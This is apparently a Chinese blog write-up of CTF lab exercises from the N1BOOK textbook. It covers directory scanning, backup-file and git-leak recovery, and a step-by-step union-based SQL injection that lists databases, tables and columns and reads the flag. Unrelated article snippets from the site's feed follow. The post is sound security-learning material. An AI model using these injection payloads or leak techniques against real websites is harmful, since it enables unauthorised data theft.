news 2026/8/27 12:26:30

《从0到1:CTFer成长之路》书籍配套题目(不定时更)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
《从0到1:CTFer成长之路》书籍配套题目(不定时更)

N1BOOK

  • 常见的搜集
  • 粗心的小李
  • SQL注入-1
    • 找注入点
    • 字段数
    • 获取数据库名
    • 获取数据表名
    • 获取数据列名
  • [第一章 web入门]SQL注入

常见的搜集

信息搜集大部分是工具的使用(git泄露可能涉及git命令的应用)

书的前半部分我,,,看不懂(只有理论)浅总结一下敏感备份文件,gedit备份文件,vim备份文件
常规文件:

放出提示:

使用dirbuster工具进行网页目录扫描,⼯具是kali⾃带,

cd /usr/share/dirbuster java -jar DirBuster-1.0-RC1.jar

用URL Fuzz,可以指定目录,指定扫描admin目录下面的所有文件,dir代表字典的每一行

/admin/{dir}.php 这样就是爆破admin目录下所有php文件
或者

或者是 dirsearch 教程,
额,环境也查了,,,没扫出来,尝试自己直接做

/robots.txt


得到提示,访问可得:flag1:n1book{info_1

/index.php~


得到提示,访问可得:flag2:s_v3ry_im

.index.php.swp

会得到一个文件

这题看了wp,软件还是没整明白,过几天再试试。

粗心的小李


Git测试,使用GitHack脚本对其进行测试,教程!kali有自带的Git、Python2和Python3。转战虚拟机…主要我下半天GitHack,一直失败!

找到原因了!!!解决不了,四处查找资料发现还有一个工具scrabble可以代替它,教程链接!
在文件夹中打开终端,

./scrabble +网址

ls查看

cat +文件

1.git回滚:当题目存在git泄露时,flag(敏感)文件可能在修改中被删除或被覆盖了,这时我们可以利用git的“git reset”命令来恢复到以前的版本,更简单的方式是通过“git log-stat”命令查看每个commit修改了哪些文件,再用“git diff HEAD commit-id”比较在当前版本与想查看的commit之间的变化。
2.git分支:每次提交时,git都会自动把它们串成一条时间线,这条时间线就是一个分支,git中默认为master分支。要找的flag或敏感文件可能不会藏在当前分支中。需要切换分支来找到想要的文件。建议工具:GitHacke
3. 泄露的git中也可能有其他有用的信息,如.git/config文件夹中可能含有access_token信息

SQL注入-1

逃不掉的sql题…要总结了一个暑假的sql,要开学了,
先看看书中,是怎么讲的!由于使用的都是get传入所以MySQL中查询和布尔盲注都不再学习。

通过HTTP的GET方式输入的id值,PHP将GET方法传入的id=1与前面的SQL查询语句进行了拼接,

找注入点

数字型注入,字符型注入

在MySQL中,等号两边如果类型不一致,则会发生强制转换。当数字与字符串数据比较时,字符串将被转换为数字,再进行比较。
按照这个特性,我们容易判断输入点是否为字符型,也就是是否有引号(可能是单引号也可能是双引号,绝大多数情况下是单引号)包裹。

另外:URL编码中空格的编码是“%20”,“#”的编码是“%23”。
?id=1’ and 1=2页面报错,说明存在注入点

字段数

id=1' order by 4 --+

利用union select 联合查询

?id=0'union select 1,2,3 --+


这里使用博客原先使用的快法,在摆一个博客!

获取数据库名

id=0' union select 1,2,group_concat(schema_name) from (information_schema.schemata) --++

库名可以一步到位!

当前数据库名

id=0' union select 1,database(),3 --++

获取数据表名

id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

获取数据列名

id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'--+

id=0' union select 1,2,group_concat(fllllag) from (fl4g)--+

[第一章 web入门]SQL注入

首先由题目提示可得,请访问 /login.php /user.php

试着依次访问这两个文件查看源代码可得提示
本文内容仅为个人经验分享,仅供参考,不构成专业建议。本人不对内容准确性做保证,读者据此操作产生的风险自行承担。文中第三方素材版权归原作者,如有侵权请联系删除。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/8/27 12:25:11

猫抓资源嗅探:三步下载网页视频并合并 M3U8,告别录屏

猫抓资源嗅探:三步下载网页视频并合并 M3U8,告别录屏 【免费下载链接】cat-catch 猫抓 浏览器资源嗅探扩展 / cat-catch Browser Resource Sniffing Extension 项目地址: https://gitcode.com/GitHub_Trending/ca/cat-catch 它替你盯住每一笔网络…

作者头像 李华
网站建设 2026/8/27 12:24:34

【性能优化】大厂OOM优化和监控方案

一、前言 随着项目不断壮大,OOM(Out Of Memory)成为奔溃统计平台上的疑难杂症之一,大部分业务开发人员对于线上OOM问题一般都是暂不处理,一方面是因为OOM问题没有足够的log,无法在短期内分析解决&#xff…

作者头像 李华
网站建设 2026/8/27 12:24:26

以阿里社招Android面试为例,详讲面对面试官到面试中到面试结束

前言 今天有个小伙伴和我说,Android技术还行,主要是对面试没什么把握,小编想了想,不该是多半面试题都会迎难而解,怎么会什么把握呢?但仔细又一想,技术和面试也是两回事,技术可以也不…

作者头像 李华
网站建设 2026/8/27 12:24:08

TOPSIS多属性决策算法:从原理到Matlab实战实现

1. 项目概述:从“清风数学建模”到TOPSIS实战如果你参加过数学建模竞赛,或者在工作中处理过需要从一堆方案里选出“最优解”的决策问题,那你大概率听说过“清风数学建模”这个名字。它不是一个官方机构,而是一位在数学建模圈子里非…

作者头像 李华
网站建设 2026/8/27 12:23:41

微型传感器裸片:IoT与汽车电子的新宠与选型要点

这两年传感器圈子里最明显的一个变化,就是“裸片”这个词被提起的频次越来越高。所谓 mini sensor dies,就是把温度、湿度、压力、加速度这类感测元件直接以晶圆裸片形态供货,省掉传统塑料封装或陶瓷封装的外壳。这个趋势在 IoT 和汽车电子这…

作者头像 李华